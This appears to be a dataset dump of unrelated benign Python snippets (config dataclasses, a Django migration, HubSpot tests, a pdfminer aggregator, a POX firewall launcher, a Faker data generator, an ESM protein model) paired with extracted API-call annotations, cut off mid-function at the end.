code
stringlengths 22
1.05M
| apis
sequencelengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
---|---|---|
from dataclasses import dataclass, field
from typing import Optional, Iterable, Union
@dataclass
class MetabaseConfig:
# Metabase Client
database: str
host: str
user: str
password: str
# Metabase additional connection opts
use_http: bool = False
verify: Union[str, bool] = True
# Metabase Sync
sync_skip: bool = False
sync_timeout: Optional[int] = None
@dataclass
class DbtConfig:
# dbt Reader
database: str
manifest_path: Optional[str] = None
path: Optional[str] = None
# dbt Target Models
schema: Optional[str] = None
schema_excludes: Iterable = field(default_factory=list)
includes: Iterable = field(default_factory=list)
excludes: Iterable = field(default_factory=list)
| [
"dataclasses.field"
] | [((624, 651), 'dataclasses.field', 'field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (629, 651), False, 'from dataclasses import dataclass, field\n'), ((677, 704), 'dataclasses.field', 'field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (682, 704), False, 'from dataclasses import dataclass, field\n'), ((730, 757), 'dataclasses.field', 'field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (735, 757), False, 'from dataclasses import dataclass, field\n')] |
from dotenv import load_dotenv
load_dotenv()
import sys
import os
import re
import json
import psycopg2
from meme_classifier.images import process_image
path = sys.argv[1]
data = json.load(open(os.path.join(path, 'result.json'), 'r'))
chat_id = data['id']
conn = psycopg2.connect(os.getenv('POSTGRES_CREDENTIALS'))
for m in data['messages']:
if 'photo' in m:
template, text = process_image(open(os.path.join(path, m['photo']), 'rb'))
message_id = m['id']
print(f'processing message {message_id}')
cur = conn.cursor()
cur.execute("INSERT INTO meme (template, text, chat_id, message_id) VALUES (%s, %s, %s, %s)", (template, text, chat_id, message_id))
conn.commit()
| [
"os.path.join",
"os.getenv",
"dotenv.load_dotenv"
] | [((31, 44), 'dotenv.load_dotenv', 'load_dotenv', ([], {}), '()\n', (42, 44), False, 'from dotenv import load_dotenv\n'), ((284, 317), 'os.getenv', 'os.getenv', (['"""POSTGRES_CREDENTIALS"""'], {}), "('POSTGRES_CREDENTIALS')\n", (293, 317), False, 'import os\n'), ((198, 231), 'os.path.join', 'os.path.join', (['path', '"""result.json"""'], {}), "(path, 'result.json')\n", (210, 231), False, 'import os\n'), ((412, 442), 'os.path.join', 'os.path.join', (['path', "m['photo']"], {}), "(path, m['photo'])\n", (424, 442), False, 'import os\n')] |
# Generated by Django 2.0.3 on 2018-03-15 01:05
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('nps', '0012_auto_20180314_1600'),
]
operations = [
migrations.CreateModel(
name='ClientAggregations',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('client', models.CharField(max_length=30)),
('survey', models.CharField(max_length=30)),
('user_type', models.CharField(blank=True, default=None, max_length=30, null=True)),
('nps_score', models.FloatField()),
('total_responses', models.IntegerField()),
('promoters', models.IntegerField()),
('detractors', models.IntegerField()),
('neutral', models.IntegerField()),
('percent_detractors', models.FloatField(blank=True, default=None, null=True)),
('percent_promoters', models.FloatField(blank=True, default=None, null=True)),
('percent_neutral', models.FloatField(blank=True, default=None, null=True)),
('statistically_significant', models.BooleanField(default=False)),
],
),
migrations.DeleteModel(
name='AggregatedResults',
),
migrations.DeleteModel(
name='ProductUsers',
),
migrations.RenameField(
model_name='productaggregations',
old_name='total_detractors',
new_name='detractors',
),
migrations.RenameField(
model_name='productaggregations',
old_name='total_neutral',
new_name='neutral',
),
migrations.RenameField(
model_name='productaggregations',
old_name='number_clients_negative',
new_name='num_clients_negative',
),
migrations.RenameField(
model_name='productaggregations',
old_name='number_clients_positive',
new_name='num_clients_positive',
),
migrations.RenameField(
model_name='productaggregations',
old_name='total_promoters',
new_name='promoters',
),
migrations.RenameField(
model_name='surveyaggregations',
old_name='total_detractors',
new_name='detractors',
),
migrations.RenameField(
model_name='surveyaggregations',
old_name='total_neutral',
new_name='neutral',
),
migrations.RenameField(
model_name='surveyaggregations',
old_name='number_clients_negative',
new_name='num_clients_negative',
),
migrations.RenameField(
model_name='surveyaggregations',
old_name='number_clients_positive',
new_name='num_clients_positive',
),
migrations.RenameField(
model_name='surveyaggregations',
old_name='total_promoters',
new_name='promoters',
),
migrations.RemoveField(
model_name='productaggregations',
name='number_clients_neutral',
),
migrations.RemoveField(
model_name='productaggregations',
name='percent_clients_neutral',
),
migrations.RemoveField(
model_name='surveyaggregations',
name='number_clients_neutral',
),
migrations.RemoveField(
model_name='surveyaggregations',
name='percent_clients_neutral',
),
migrations.AddField(
model_name='productaggregations',
name='user_type',
field=models.CharField(blank=True, default=None, max_length=30, null=True),
),
migrations.AddField(
model_name='surveyaggregations',
name='user_type',
field=models.CharField(blank=True, default=None, max_length=30, null=True),
),
migrations.AlterUniqueTogether(
name='clientaggregations',
unique_together={('client', 'survey', 'user_type')},
),
]
| [
"django.db.migrations.AlterUniqueTogether",
"django.db.migrations.DeleteModel",
"django.db.models.FloatField",
"django.db.models.IntegerField",
"django.db.models.BooleanField",
"django.db.models.AutoField",
"django.db.migrations.RemoveField",
"django.db.migrations.RenameField",
"django.db.models.CharField"
] | [((1327, 1375), 'django.db.migrations.DeleteModel', 'migrations.DeleteModel', ([], {'name': '"""AggregatedResults"""'}), "(name='AggregatedResults')\n", (1349, 1375), False, 'from django.db import migrations, models\n'), ((1408, 1451), 'django.db.migrations.DeleteModel', 'migrations.DeleteModel', ([], {'name': '"""ProductUsers"""'}), "(name='ProductUsers')\n", (1430, 1451), False, 'from django.db import migrations, models\n'), ((1484, 1597), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""productaggregations"""', 'old_name': '"""total_detractors"""', 'new_name': '"""detractors"""'}), "(model_name='productaggregations', old_name=\n 'total_detractors', new_name='detractors')\n", (1506, 1597), False, 'from django.db import migrations, models\n'), ((1649, 1756), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""productaggregations"""', 'old_name': '"""total_neutral"""', 'new_name': '"""neutral"""'}), "(model_name='productaggregations', old_name=\n 'total_neutral', new_name='neutral')\n", (1671, 1756), False, 'from django.db import migrations, models\n'), ((1808, 1938), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""productaggregations"""', 'old_name': '"""number_clients_negative"""', 'new_name': '"""num_clients_negative"""'}), "(model_name='productaggregations', old_name=\n 'number_clients_negative', new_name='num_clients_negative')\n", (1830, 1938), False, 'from django.db import migrations, models\n'), ((1990, 2120), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""productaggregations"""', 'old_name': '"""number_clients_positive"""', 'new_name': '"""num_clients_positive"""'}), "(model_name='productaggregations', old_name=\n 'number_clients_positive', new_name='num_clients_positive')\n", (2012, 2120), False, 'from django.db import migrations, models\n'), ((2172, 2283), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""productaggregations"""', 'old_name': '"""total_promoters"""', 'new_name': '"""promoters"""'}), "(model_name='productaggregations', old_name=\n 'total_promoters', new_name='promoters')\n", (2194, 2283), False, 'from django.db import migrations, models\n'), ((2335, 2447), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""surveyaggregations"""', 'old_name': '"""total_detractors"""', 'new_name': '"""detractors"""'}), "(model_name='surveyaggregations', old_name=\n 'total_detractors', new_name='detractors')\n", (2357, 2447), False, 'from django.db import migrations, models\n'), ((2499, 2605), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""surveyaggregations"""', 'old_name': '"""total_neutral"""', 'new_name': '"""neutral"""'}), "(model_name='surveyaggregations', old_name=\n 'total_neutral', new_name='neutral')\n", (2521, 2605), False, 'from django.db import migrations, models\n'), ((2657, 2786), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""surveyaggregations"""', 'old_name': '"""number_clients_negative"""', 'new_name': '"""num_clients_negative"""'}), "(model_name='surveyaggregations', old_name=\n 'number_clients_negative', new_name='num_clients_negative')\n", (2679, 2786), False, 'from django.db import migrations, models\n'), ((2838, 2967), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""surveyaggregations"""', 'old_name': '"""number_clients_positive"""', 'new_name': '"""num_clients_positive"""'}), "(model_name='surveyaggregations', old_name=\n 'number_clients_positive', new_name='num_clients_positive')\n", (2860, 2967), False, 'from django.db import migrations, models\n'), ((3019, 3129), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""surveyaggregations"""', 'old_name': '"""total_promoters"""', 'new_name': '"""promoters"""'}), "(model_name='surveyaggregations', old_name=\n 'total_promoters', new_name='promoters')\n", (3041, 3129), False, 'from django.db import migrations, models\n'), ((3181, 3273), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""productaggregations"""', 'name': '"""number_clients_neutral"""'}), "(model_name='productaggregations', name=\n 'number_clients_neutral')\n", (3203, 3273), False, 'from django.db import migrations, models\n'), ((3313, 3406), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""productaggregations"""', 'name': '"""percent_clients_neutral"""'}), "(model_name='productaggregations', name=\n 'percent_clients_neutral')\n", (3335, 3406), False, 'from django.db import migrations, models\n'), ((3446, 3537), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""surveyaggregations"""', 'name': '"""number_clients_neutral"""'}), "(model_name='surveyaggregations', name=\n 'number_clients_neutral')\n", (3468, 3537), False, 'from django.db import migrations, models\n'), ((3577, 3669), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""surveyaggregations"""', 'name': '"""percent_clients_neutral"""'}), "(model_name='surveyaggregations', name=\n 'percent_clients_neutral')\n", (3599, 3669), False, 'from django.db import migrations, models\n'), ((4116, 4231), 'django.db.migrations.AlterUniqueTogether', 'migrations.AlterUniqueTogether', ([], {'name': '"""clientaggregations"""', 'unique_together': "{('client', 'survey', 'user_type')}"}), "(name='clientaggregations', unique_together={\n ('client', 'survey', 'user_type')})\n", (4146, 4231), False, 'from django.db import migrations, models\n'), ((3824, 3892), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'default': 'None', 'max_length': '(30)', 'null': '(True)'}), '(blank=True, default=None, max_length=30, null=True)\n', (3840, 3892), False, 'from django.db import migrations, models\n'), ((4027, 4095), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'default': 'None', 'max_length': '(30)', 'null': '(True)'}), '(blank=True, default=None, max_length=30, null=True)\n', (4043, 4095), False, 'from django.db import migrations, models\n'), ((338, 431), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (354, 431), False, 'from django.db import migrations, models\n'), ((457, 488), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(30)'}), '(max_length=30)\n', (473, 488), False, 'from django.db import migrations, models\n'), ((518, 549), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(30)'}), '(max_length=30)\n', (534, 549), False, 'from django.db import migrations, models\n'), ((582, 650), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'default': 'None', 'max_length': '(30)', 'null': '(True)'}), '(blank=True, default=None, max_length=30, null=True)\n', (598, 650), False, 'from django.db import migrations, models\n'), ((683, 702), 'django.db.models.FloatField', 'models.FloatField', ([], {}), '()\n', (700, 702), False, 'from django.db import migrations, models\n'), ((741, 762), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (760, 762), False, 'from django.db import migrations, models\n'), ((795, 816), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (814, 816), False, 'from django.db import migrations, models\n'), ((850, 871), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (869, 871), False, 'from django.db import migrations, models\n'), ((902, 923), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (921, 923), False, 'from django.db import migrations, models\n'), ((965, 1019), 'django.db.models.FloatField', 'models.FloatField', ([], {'blank': '(True)', 'default': 'None', 'null': '(True)'}), '(blank=True, default=None, null=True)\n', (982, 1019), False, 'from django.db import migrations, models\n'), ((1060, 1114), 'django.db.models.FloatField', 'models.FloatField', ([], {'blank': '(True)', 'default': 'None', 'null': '(True)'}), '(blank=True, default=None, null=True)\n', (1077, 1114), False, 'from django.db import migrations, models\n'), ((1153, 1207), 'django.db.models.FloatField', 'models.FloatField', ([], {'blank': '(True)', 'default': 'None', 'null': '(True)'}), '(blank=True, default=None, null=True)\n', (1170, 1207), False, 'from django.db import migrations, models\n'), ((1256, 1290), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (1275, 1290), False, 'from django.db import migrations, models\n')] |
import time
import unittest
from nose.plugins.attrib import attr
from hubspot3.test import helper
from hubspot3.broadcast import Broadcast, BroadcastClient
class BroadcastClientTest(unittest.TestCase):
""" Unit tests for the HubSpot Broadcast API Python client.
This file contains some unittest tests for the Broadcast API.
Questions, comments: http://docs.hubapi.com/wiki/Discussion_Group
"""
def setUp(self):
self.client = BroadcastClient(**helper.get_options())
self.broadcast_guids = None
def tearDown(self):
# Cancel any broadcasts created as part of the tests
if self.broadcast_guids:
list(map(self.client.cancel_broadcast, self.broadcast_guids))
@attr("api")
def test_get_broadcasts(self):
# Should fetch at least 1 broadcast on the test portal 62515
broadcasts = self.client.get_broadcasts(limit=1)
self.assertTrue(len(broadcasts) > 0)
broadcast = broadcasts[0].to_dict()
self.assertIsNotNone(broadcast["channelGuid"])
print("\n\nFetched some broadcasts")
broadcast_guid = broadcast["broadcastGuid"]
# Re-fetch the broadcast using different call
bcast = self.client.get_broadcast(broadcast_guid)
# Should have expected fields
self.assertIsNotNone(bcast.broadcast_guid)
self.assertIsNotNone(bcast.channel_guid)
self.assertIsNotNone(bcast.status)
@attr("api")
def test_get_channels(self):
# Fetch older channels ensured to exist
channels = self.client.get_channels(current=True)
self.assertTrue(len(channels) > 0)
@attr("api")
def test_create_broadcast(self):
content = dict(body="Test hubspot3 unit tests http://www.hubspot.com")
channels = self.client.get_channels(current=True, publish_only=True)
if len(channels) == 0:
self.fail("Failed to find a publishable channel")
channel = channels[0]
# Get a trigger in the future
trigger_at = int(time.time() + 6000) * 1000
bcast = Broadcast(
{
"content": content,
"triggerAt": trigger_at,
"channelGuid": channel.channel_guid,
}
)
try:
resp = self.client.create_broadcast(bcast)
broadcast = Broadcast(resp)
self.assertIsNotNone(broadcast.broadcast_guid)
self.assertEqual(channel.channel_guid, broadcast.channel_guid)
# Ensure it is canceled
self.broadcast_guids = []
self.broadcast_guids.append(broadcast.broadcast_guid)
except Exception as e:
self.fail("Should not have raised exception: {}".format(e))
if __name__ == "__main__":
unittest.main()
| [
"nose.plugins.attrib.attr",
"hubspot3.test.helper.get_options",
"unittest.main",
"time.time",
"hubspot3.broadcast.Broadcast"
] | [((733, 744), 'nose.plugins.attrib.attr', 'attr', (['"""api"""'], {}), "('api')\n", (737, 744), False, 'from nose.plugins.attrib import attr\n'), ((1448, 1459), 'nose.plugins.attrib.attr', 'attr', (['"""api"""'], {}), "('api')\n", (1452, 1459), False, 'from nose.plugins.attrib import attr\n'), ((1648, 1659), 'nose.plugins.attrib.attr', 'attr', (['"""api"""'], {}), "('api')\n", (1652, 1659), False, 'from nose.plugins.attrib import attr\n'), ((2782, 2797), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2795, 2797), False, 'import unittest\n'), ((2084, 2181), 'hubspot3.broadcast.Broadcast', 'Broadcast', (["{'content': content, 'triggerAt': trigger_at, 'channelGuid': channel.\n channel_guid}"], {}), "({'content': content, 'triggerAt': trigger_at, 'channelGuid':\n channel.channel_guid})\n", (2093, 2181), False, 'from hubspot3.broadcast import Broadcast, BroadcastClient\n'), ((2356, 2371), 'hubspot3.broadcast.Broadcast', 'Broadcast', (['resp'], {}), '(resp)\n', (2365, 2371), False, 'from hubspot3.broadcast import Broadcast, BroadcastClient\n'), ((476, 496), 'hubspot3.test.helper.get_options', 'helper.get_options', ([], {}), '()\n', (494, 496), False, 'from hubspot3.test import helper\n'), ((2041, 2052), 'time.time', 'time.time', ([], {}), '()\n', (2050, 2052), False, 'import time\n')] |
#!/usr/bin/env python3
import math
try:
# from PDFPageDetailedAggregator:
from pdfminer.pdfdocument import PDFDocument, PDFNoOutlines
from pdfminer.pdfparser import PDFParser
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import PDFPageAggregator
from pdfminer.layout import LTPage, LTChar, LTAnno, LAParams, LTTextBox, LTTextLine
except ModuleNotFoundError:
prerr("To use the aggregator (required for generating chunks.json)"
" you must first install the following module for Python:")
prerr(" pdfminer")
exit(1)
try:
input = raw_input
except NameError:
# Python 3
pass
# TODO:
from srd import (
objDict,
BBox,
DocChunk,
clean_frag_text,
clean_frag,
same_style,
frag_dict,
)
def ltannoDict(ltanno):
return objDict(ltanno)
'''
class DocFragment:
def __init__(self, text, fontname, size):
self.text = text
self.fontname = fontname
self.size = size
def sameStyle(self, fragment):
"""
Is same fontname and size.
"""
ffn = fragment.fontname
ffs = fragment.size
return (ffs == self.size) and (ffn == self.fontname)
def clean(self):
self.text = clean_frag_text(self.text)
'''
class PDFPageDetailedAggregator(PDFPageAggregator):
"""
This class is based on PDFPageDetailedAggregator from
lindblandro's Oct 4 '13 at 10:33 answer
edited by slushy Feb 4 '14 at 23:41
at <https://stackoverflow.com/a/19179114>
on <https://stackoverflow.com/questions/15737806/extract-text-using-
pdfminer-and-pypdf2-merges-columns>.
"""
def __init__(self, rsrcmgr, pageno=1, laparams=None,
colStarts=None):
PDFPageAggregator.__init__(self, rsrcmgr, pageno=pageno, laparams=laparams)
self.chunks = []
self.colStarts = colStarts
if self.colStarts is not None:
print("columns: {}".format(len(self.colStarts)))
self.page_number = 0
def receive_layout(self, ltpage):
def render(item, page_number):
if isinstance(item, LTPage) or isinstance(item, LTTextBox):
for child in item:
render(child, page_number)
elif isinstance(item, LTTextLine):
child_str = ''
fontSize = None
fontName = None
fontSizes = []
fontNames = []
warnings = []
parts = []
fragments = []
annotations = []
for child in item:
strp = None
if isinstance(child, LTChar):
child_str += child.get_text()
strp = child.get_text().strip()
# and (len(strp) > 0)
if fontName is not None:
if fontName != child.fontname:
warnings.append("mixed fontName")
if fontSize is not None:
if fontSize != child.size:
warnings.append("mixed fontSize")
fontName = child.fontname
fontSize = child.size
frag = frag_dict(
child.get_text(),
child.fontname,
child.size,
)
fragments.append(frag)
# fontNames.append(fontName)
# fontSizes.append(fontSize)
parts.append(strp)
elif isinstance(child, LTAnno):
child_str += child.get_text()
strp = child.get_text().strip()
annotations.append(ltannoDict(child))
child_str = ' '.join(child_str.split()).strip()
if child_str:
if len(warnings) > 0:
"""
print("Warnings in \"{}\":"
" {}: fonts {} sizes {} parts {}"
"".format(child_str, warnings, fontNames,
fontSizes, parts))
input("Press enter to continue...")
"""
fontSize = None
fontName = None
col = None
cols = 0
if self.colStarts is not None:
cols = len(self.colStarts)
if (cols is None) or (cols == 1):
col = 0
elif (cols == 2):
col = 0
col2Min = math.floor(self.colStarts[1])
if item.bbox[0] >= col2Min:
col = 1 # Index [1] is column 2.
else:
raise ValueError("Only a list of length 1 (same as None) or 2"
" is implemented for \"colStarts\".")
# if isinstance(child, LTChar):
'''
try:
fontName = child.fontname
fontSize = child.size
# Avoid "AttributeError:
# 'LTAnno' object has no attribute 'fontname'"
except AttributeError as ex:
print("dir(LTTextLine): {}".format(dir(LTTextLine)))
print("dir(child): {}".format(dir(child)))
raise ex
'''
chunk = DocChunk(
page_number,
col,
item.bbox,
child_str,
fontName=fontName,
fontSize=fontSize,
fragments=fragments,
annotations=annotations,
)
chunk.groupFragments()
self.chunks.append(chunk)
for child in item:
render(child, page_number)
return
render(ltpage, self.page_number)
self.page_number += 1
self.chunks = sorted(self.chunks, key = lambda f: (f.pageid, f.column, -f.bbox.y1))
self.result = ltpage
| [
"srd.DocChunk",
"pdfminer.converter.PDFPageAggregator.__init__",
"srd.objDict",
"math.floor"
] | [((851, 866), 'srd.objDict', 'objDict', (['ltanno'], {}), '(ltanno)\n', (858, 866), False, 'from srd import objDict, BBox, DocChunk, clean_frag_text, clean_frag, same_style, frag_dict\n'), ((1782, 1857), 'pdfminer.converter.PDFPageAggregator.__init__', 'PDFPageAggregator.__init__', (['self', 'rsrcmgr'], {'pageno': 'pageno', 'laparams': 'laparams'}), '(self, rsrcmgr, pageno=pageno, laparams=laparams)\n', (1808, 1857), False, 'from pdfminer.converter import PDFPageAggregator\n'), ((5800, 5936), 'srd.DocChunk', 'DocChunk', (['page_number', 'col', 'item.bbox', 'child_str'], {'fontName': 'fontName', 'fontSize': 'fontSize', 'fragments': 'fragments', 'annotations': 'annotations'}), '(page_number, col, item.bbox, child_str, fontName=fontName,\n fontSize=fontSize, fragments=fragments, annotations=annotations)\n', (5808, 5936), False, 'from srd import objDict, BBox, DocChunk, clean_frag_text, clean_frag, same_style, frag_dict\n'), ((4868, 4897), 'math.floor', 'math.floor', (['self.colStarts[1]'], {}), '(self.colStarts[1])\n', (4878, 4897), False, 'import math\n')] |
from pox.core import core
import pox.openflow.libopenflow_01 as of
from forwarding.l2_learning import *
from tkinter import *
from project.firewall import TestFW
from project.ui import UI
def setup():
top = Toplevel()
# quit POX when window is killed
top.protocol("WM_DELETE_WINDOW", core.quit)
top.title("firewall thing")
frame = Frame(top, padding="3")
frame.grid()
disp = Label(frame, text="hmm").grid(column=0, row=0)
def reload():
conn = core.openflow.getConnection(1)
disp.configure(str(dir(conn)))
b_reload = Button(frame, text="reload", command=reload).grid(column=0, row=1)
b_quit = Button(frame, text="quit", command=top.destroy).grid(column=0, row=2)
def launch():
fw_list_dpid = [51, 52]
srv_list = {"web" : ['10.0.0.100']}
# register firewall
core.registerNew(TestFW, fw_list_dpid[0], srv_list)
# just use L2 learning switch for others
core.registerNew(l2_learning, False)
#core.registerNew(UI)
def start_ui():
core.tk.do(setup)
core.call_when_ready(start_ui, ['openflow', 'tk'])
| [
"pox.core.core.tk.do",
"pox.core.core.call_when_ready",
"pox.core.core.registerNew",
"pox.core.core.openflow.getConnection"
] | [((851, 902), 'pox.core.core.registerNew', 'core.registerNew', (['TestFW', 'fw_list_dpid[0]', 'srv_list'], {}), '(TestFW, fw_list_dpid[0], srv_list)\n', (867, 902), False, 'from pox.core import core\n'), ((954, 990), 'pox.core.core.registerNew', 'core.registerNew', (['l2_learning', '(False)'], {}), '(l2_learning, False)\n', (970, 990), False, 'from pox.core import core\n'), ((1080, 1130), 'pox.core.core.call_when_ready', 'core.call_when_ready', (['start_ui', "['openflow', 'tk']"], {}), "(start_ui, ['openflow', 'tk'])\n", (1100, 1130), False, 'from pox.core import core\n'), ((500, 530), 'pox.core.core.openflow.getConnection', 'core.openflow.getConnection', (['(1)'], {}), '(1)\n', (527, 530), False, 'from pox.core import core\n'), ((1049, 1066), 'pox.core.core.tk.do', 'core.tk.do', (['setup'], {}), '(setup)\n', (1059, 1066), False, 'from pox.core import core\n')] |
# 获取调课、改课通知例子
from zfnew import GetInfo, Login
base_url = '学校教务系统的主页url'
lgn = Login(base_url=base_url)
lgn.login('账号', '密码')
cookies = lgn.cookies # cookies获取方法
person = GetInfo(base_url=base_url, cookies=cookies)
message = person.get_message()
print(message)
| [
"zfnew.GetInfo",
"zfnew.Login"
] | [((82, 106), 'zfnew.Login', 'Login', ([], {'base_url': 'base_url'}), '(base_url=base_url)\n', (87, 106), False, 'from zfnew import GetInfo, Login\n'), ((175, 218), 'zfnew.GetInfo', 'GetInfo', ([], {'base_url': 'base_url', 'cookies': 'cookies'}), '(base_url=base_url, cookies=cookies)\n', (182, 218), False, 'from zfnew import GetInfo, Login\n')] |
import sys
import random
from faker import Faker
def gera(nLinhas=100, nCampos=None):
with open(f"{path}/file{nLinhas}-{nCampos}_python.txt", "w+", encoding="utf8") as file:
if not nCampos:
nCampos = random.randint(2, 10)
camposFuncs = [
fake.name,
fake.date,
fake.ssn,
fake.ascii_email,
fake.job,
fake.phone_number,
fake.coordinate,
fake.license_plate,
fake.credit_card_expire,
][:nCampos]
for _ in range(nLinhas):
file.write(f"{random.randint(0, 999999)},")
for funcao in camposFuncs[:-1]:
file.write(f"{funcao()},")
file.write(camposFuncs[-1]())
file.write("\n")
if __name__ == "__main__":
fake = Faker("pt_BR")
path = "python/"
try:
nLinhas = int(sys.argv[1])
nCampos = int(sys.argv[2])
except:
nLinhas = 1000
nCampos = 10
gera(nLinhas, nCampos)
| [
"faker.Faker",
"random.randint"
] | [((830, 844), 'faker.Faker', 'Faker', (['"""pt_BR"""'], {}), "('pt_BR')\n", (835, 844), False, 'from faker import Faker\n'), ((226, 247), 'random.randint', 'random.randint', (['(2)', '(10)'], {}), '(2, 10)\n', (240, 247), False, 'import random\n'), ((602, 627), 'random.randint', 'random.randint', (['(0)', '(999999)'], {}), '(0, 999999)\n', (616, 627), False, 'import random\n')] |
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from .modules import (
TransformerLayer,
LearnedPositionalEmbedding,
SinusoidalPositionalEmbedding,
RobertaLMHead,
ESM1bLayerNorm,
ContactPredictionHead,
)
class ProteinBertModel(nn.Module):
@classmethod
def add_args(cls, parser):
parser.add_argument(
"--num_layers", default=36, type=int, metavar="N", help="number of layers"
)
parser.add_argument(
"--embed_dim", default=1280, type=int, metavar="N", help="embedding dimension"
)
parser.add_argument(
"--logit_bias", action="store_true", help="whether to apply bias to logits"
)
parser.add_argument(
"--ffn_embed_dim",
default=5120,
type=int,
metavar="N",
help="embedding dimension for FFN",
)
parser.add_argument(
"--attention_heads",
default=20,
type=int,
metavar="N",
help="number of attention heads",
)
def __init__(self, args, alphabet):
super().__init__()
self.args = args
self.alphabet_size = len(alphabet)
self.padding_idx = alphabet.padding_idx
self.mask_idx = alphabet.mask_idx
self.cls_idx = alphabet.cls_idx
self.eos_idx = alphabet.eos_idx
if self.args.arch == 'roberta_large':
self.model_version = 'ESM-1b'
self._init_submodules_esm1b()
else:
self.model_version = 'ESM-1'
self._init_submodules_esm1()
def _init_submodules_common(self):
self.embed_tokens = nn.Embedding(
self.alphabet_size, self.args.embed_dim, padding_idx=self.padding_idx
)
self.layers = nn.ModuleList(
[
TransformerLayer(
self.args.embed_dim, self.args.ffn_embed_dim, self.args.attention_heads,
add_bias_kv=(self.model_version != 'ESM-1b'),
use_esm1b_layer_norm=(self.model_version == 'ESM-1b'),
)
for _ in range(self.args.layers)
]
)
self.contact_head = ContactPredictionHead(self.args.layers * self.args.attention_heads)
def _init_submodules_esm1b(self):
self._init_submodules_common()
self.embed_scale = 1
self.embed_positions = LearnedPositionalEmbedding(self.args.max_positions, self.args.embed_dim, self.padding_idx)
self.emb_layer_norm_before = ESM1bLayerNorm(self.args.embed_dim)
self.emb_layer_norm_after = ESM1bLayerNorm(self.args.embed_dim)
self.lm_head = RobertaLMHead(
embed_dim=self.args.embed_dim,
output_dim=self.alphabet_size,
weight=self.embed_tokens.weight
)
def _init_submodules_esm1(self):
self._init_submodules_common()
self.embed_scale = math.sqrt(self.args.embed_dim)
self.embed_positions = SinusoidalPositionalEmbedding(self.args.embed_dim, self.padding_idx)
self.embed_out = nn.Parameter(
torch.zeros((self.alphabet_size, self.args.embed_dim))
)
self.embed_out_bias = None
if self.args.final_bias:
self.embed_out_bias = nn.Parameter(torch.zeros(self.alphabet_size))
def forward(self, tokens, repr_layers=[], need_head_weights=False, return_contacts=False):
if return_contacts:
need_head_weights = True
assert tokens.ndim == 2
padding_mask = tokens.eq(self.padding_idx) # B, T
x = self.embed_scale * self.embed_tokens(tokens)
if getattr(self.args, 'token_dropout', False):
x.masked_fill_((tokens == self.mask_idx).unsqueeze(-1), 0.0)
# x: B x T x C
mask_ratio_train = 0.15 * 0.8
src_lengths = (~padding_mask).sum(-1)
mask_ratio_observed = (tokens == self.mask_idx).sum(-1).float() / src_lengths
x = x * (1 - mask_ratio_train) / (1 - mask_ratio_observed)[:, None, None]
x = x + self.embed_positions(tokens)
if self.model_version == 'ESM-1b':
x = self.emb_layer_norm_before(x)
if padding_mask is not None:
x = x * (1 - padding_mask.unsqueeze(-1).type_as(x))
repr_layers = set(repr_layers)
hidden_representations = {}
if 0 in repr_layers:
hidden_representations[0] = x
if need_head_weights:
attn_weights = []
# (B, T, E) => (T, B, E)
x = x.transpose(0, 1)
if not padding_mask.any():
padding_mask = None
for layer_idx, layer in enumerate(self.layers):
x, attn = layer(x, self_attn_padding_mask=padding_mask, need_head_weights=need_head_weights)
if (layer_idx + 1) in repr_layers:
hidden_representations[layer_idx + 1] = x.transpose(0, 1)
if need_head_weights:
# (H, B, T, T) => (B, H, T, T)
attn_weights.append(attn.transpose(1, 0))
if self.model_version == 'ESM-1b':
x = self.emb_layer_norm_after(x)
x = x.transpose(0, 1) # (T, B, E) => (B, T, E)
# last hidden representation should have layer norm applied
if (layer_idx + 1) in repr_layers:
hidden_representations[layer_idx + 1] = x
x = self.lm_head(x)
else:
x = F.linear(x, self.embed_out, bias=self.embed_out_bias)
x = x.transpose(0, 1) # (T, B, E) => (B, T, E)
result = {"logits": x, "representations": hidden_representations}
if need_head_weights:
# attentions: B x L x H x T x T
attentions = torch.stack(attn_weights, 1)
if self.model_version == "ESM-1":
# ESM-1 models have an additional null-token for attention, which we remove
attentions = attentions[..., :-1]
if padding_mask is not None:
attention_mask = (1 - padding_mask.type_as(attentions))
attention_mask = attention_mask.unsqueeze(1) * attention_mask.unsqueeze(2)
